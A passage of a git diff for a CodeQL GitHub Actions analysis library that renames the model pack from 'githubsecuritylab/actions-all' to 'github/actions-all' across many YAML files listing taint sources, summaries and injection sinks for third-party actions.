extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e78dfb3b073d..dabec4e8d215 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 29dac5cffeaa..2db040a0709a 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index f2331633485c..e8d4aa790a66 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index e492f6012788..8fde3e0c110f 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index a821b049232a..e9b04f2806f6 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 4f9f887caf1f..386baaf2f95a 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 365f3ac98f88..d9c7d33c86f4 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index f42e84655338..016a8ebc8cfa 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index e21b52241667..d358aa238931 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index 6c4a5931b98f..f37bcbd62973 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index c7e89697afb6..05acda9aac9d 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index aa8496038365..4b0c810d2304 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ae869b6b5313..acdf3ead4a41 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index 9f5801b79c04..b138d59c57ef 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index a4a473b8efd2..63b236f32add 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 10a03e4d1863..0c6debc5d5e4 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index 9af82b985f31..b72bd69e6255 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 3b779d0b86d8..fec2376377e0 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 6ad087730e41..3201ac370b48 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index fa9c19583524..59c6e39515e6 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 6bfaffb2bbab..06371eebae21 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index 03fa8beaf0b3..a12a478d9bd9 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index a4ccaac2d2e0..28357d5f4689 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 7c32705dde54..cfdff1898aee 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 902483f43997..f4ad5f7292b4 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index be86a330b97e..872b4e243d71 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 0a6f7c347226..bd53ab3d65a2 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index 613b3e0fc59f..db650eeb7c76 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 489d47ac71e9..34d63f31ca86 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index 4a98ecd4af16..02d6d804699a 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 57dc40ef6b8b..46fb5fd7dd6d 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 3b92f667ae90..0aab8b946328 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index da8b02312ea0..62bb26ba1ff5 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index c06d13301d27..dfacbbc14f46 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 61935c36f7d6..b258b619b6c5 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 89f61cedc422..76b0c1d7d32c 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 1aabfc23fc4b..587519e948b5 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index d55fdbc3ea98..58cbf9cc7423 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index d01ac86d3178..cc39018b9b1f 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index bab76cbe27ff..a0b5bc0dee41 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index 02ac5032c797..89d91208ad46 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index 0c484d44549b..65a4cc606528 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index c088c7a644eb..d82962aa0969 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index 5b22ac1f5fe8..32622271d6a3 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 3329a255e6f8..8dbc5ee2aded 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 14a1cdeed86a..0bbd6364b5e0 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 49931d93f885..6d6ec4a393e5 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 37d0014bcbb4..78737c6bb8bd 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 9058c9fb984c..64d5aac33ab8 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index 713c5c61cea7..c921df3fa7d0 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 40b02283152a..623483db63ec 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index c08505f97477..5184c3c4c48c 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 6305fd339604..c898d41c8387 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 739880968188..d7c874c77870 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index ee9a0dbb32a6..398dfb5c766c 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index f056cf5d8644..872964f8215f 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 838f0b308487..91f3c056e6de 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index c215755f61dd..79a12582e9e4 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - 